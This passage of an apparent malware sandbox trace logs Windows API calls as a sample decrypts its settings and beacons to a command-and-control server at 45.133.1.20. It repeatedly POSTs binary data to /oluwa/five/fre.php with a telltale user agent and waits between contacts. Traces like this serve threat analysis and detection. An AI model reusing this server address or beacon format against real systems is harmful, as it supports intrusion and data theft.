hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0246.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.205] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.206] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.206] GetProcessHeap () returned 0x6a0000 [0246.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0246.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.208] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0246.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.209] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0246.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.213] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0246.213] GetProcessHeap () returned 0x6a0000 [0246.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.214] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0246.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.215] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0246.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.217] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0246.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.218] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0246.218] GetProcessHeap () returned 0x6a0000 [0246.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0246.218] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0246.218] GetProcessHeap () returned 0x6a0000 [0246.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0246.218] socket (af=2, type=1, protocol=6) returned 0x7f8 [0246.218] connect (s=0x7f8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0246.241] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0246.241] GetProcessHeap () returned 0x6a0000 [0246.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0246.241] GetProcessHeap () returned 0x6a0000 [0246.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0246.242] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.243] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.243] GetProcessHeap () returned 0x6a0000 [0246.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c48b8 [0246.243] GetProcessHeap () returned 0x6a0000 [0246.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0246.244] GetProcessHeap () returned 0x6a0000 [0246.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0246.244] GetProcessHeap () returned 0x6a0000 [0246.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0246.246] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.247] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.247] GetProcessHeap () returned 0x6a0000 [0246.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0246.247] GetProcessHeap () returned 0x6a0000 [0246.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0246.247] send (s=0x7f8, buf=0x6bd460*, len=242, flags=0) returned 242 [0246.248] send (s=0x7f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0246.248] GetProcessHeap () returned 0x6a0000 [0246.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0246.248] recv (in: s=0x7f8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0246.315] GetProcessHeap () returned 0x6a0000 [0246.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0246.316] GetProcessHeap () returned 0x6a0000 [0246.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0246.316] GetProcessHeap () returned 0x6a0000 [0246.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c48b8 | out: hHeap=0x6a0000) returned 1 [0246.317] GetProcessHeap () returned 0x6a0000 [0246.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0246.317] closesocket (s=0x7f8) returned 0 [0246.317] GetProcessHeap () returned 0x6a0000 [0246.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0246.318] GetProcessHeap () returned 0x6a0000 [0246.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.318] GetProcessHeap () returned 0x6a0000 [0246.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0246.319] GetProcessHeap () returned 0x6a0000 [0246.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0246.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x152c) returned 0x7f8 [0246.323] Sleep (dwMilliseconds=0xea60) [0246.340] GetProcessHeap () returned 0x6a0000 [0246.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0246.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.355] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0246.366] GetProcessHeap () returned 0x6a0000 [0246.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0246.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.367] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0246.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.368] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.377] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.378] GetProcessHeap () returned 0x6a0000 [0246.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0246.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.379] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0246.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.380] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0246.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.381] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0246.382] GetProcessHeap () returned 0x6a0000 [0246.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.383] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.384] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.385] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.387] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.387] GetProcessHeap () returned 0x6a0000 [0246.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0246.387] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.387] GetProcessHeap () returned 0x6a0000 [0246.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0246.388] GetProcessHeap () returned 0x6a0000 [0246.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.388] GetProcessHeap () returned 0x6a0000 [0246.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0246.389] GetProcessHeap () returned 0x6a0000 [0246.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0246.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.400] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0246.410] GetProcessHeap () returned 0x6a0000 [0246.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0246.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.412] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0246.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.413] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.414] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.414] GetProcessHeap () returned 0x6a0000 [0246.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0246.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.419] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0246.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.420] CryptDestroyKey (hKey=0x6ad560) returned 1 [0246.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.421] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0246.421] GetProcessHeap () returned 0x6a0000 [0246.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.422] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0246.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.423] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0246.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.425] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0246.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.426] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0246.426] GetProcessHeap () returned 0x6a0000 [0246.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0246.426] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0246.426] GetProcessHeap () returned 0x6a0000 [0246.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0246.426] socket (af=2, type=1, protocol=6) returned 0x7fc [0246.427] connect (s=0x7fc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0246.452] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0246.452] GetProcessHeap () returned 0x6a0000 [0246.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0246.452] GetProcessHeap () returned 0x6a0000 [0246.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0246.453] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.454] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.454] GetProcessHeap () returned 0x6a0000 [0246.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5038 [0246.454] GetProcessHeap () returned 0x6a0000 [0246.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0246.455] GetProcessHeap () returned 0x6a0000 [0246.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0246.455] GetProcessHeap () returned 0x6a0000 [0246.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0246.457] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.458] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.458] GetProcessHeap () returned 0x6a0000 [0246.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0246.458] GetProcessHeap () returned 0x6a0000 [0246.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0246.459] send (s=0x7fc, buf=0x6bd460*, len=242, flags=0) returned 242 [0246.459] send (s=0x7fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0246.460] GetProcessHeap () returned 0x6a0000 [0246.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0246.460] recv (in: s=0x7fc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0246.537] GetProcessHeap () returned 0x6a0000 [0246.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0246.537] GetProcessHeap () returned 0x6a0000 [0246.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0246.538] GetProcessHeap () returned 0x6a0000 [0246.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5038 | out: hHeap=0x6a0000) returned 1 [0246.539] GetProcessHeap () returned 0x6a0000 [0246.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0246.539] closesocket (s=0x7fc) returned 0 [0246.540] GetProcessHeap () returned 0x6a0000 [0246.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0246.540] GetProcessHeap () returned 0x6a0000 [0246.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.541] GetProcessHeap () returned 0x6a0000 [0246.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0246.541] GetProcessHeap () returned 0x6a0000 [0246.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0246.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1530) returned 0x7fc [0246.544] Sleep (dwMilliseconds=0xea60) [0246.545] GetProcessHeap () returned 0x6a0000 [0246.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0246.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0246.562] GetProcessHeap () returned 0x6a0000 [0246.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0246.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.563] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0246.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.565] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.566] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.566] GetProcessHeap () returned 0x6a0000 [0246.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0246.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.568] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0246.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.569] CryptDestroyKey (hKey=0x6ad020) returned 1 [0246.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.570] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0246.570] GetProcessHeap () returned 0x6a0000 [0246.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.571] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.572] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.573] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.573] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.573] GetProcessHeap () returned 0x6a0000 [0246.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0246.579] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.579] GetProcessHeap () returned 0x6a0000 [0246.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0246.579] GetProcessHeap () returned 0x6a0000 [0246.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.580] GetProcessHeap () returned 0x6a0000 [0246.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0246.580] GetProcessHeap () returned 0x6a0000 [0246.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0246.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.589] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0246.601] GetProcessHeap () returned 0x6a0000 [0246.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0246.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.602] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0246.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.603] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.605] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.605] GetProcessHeap () returned 0x6a0000 [0246.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0246.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.606] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: 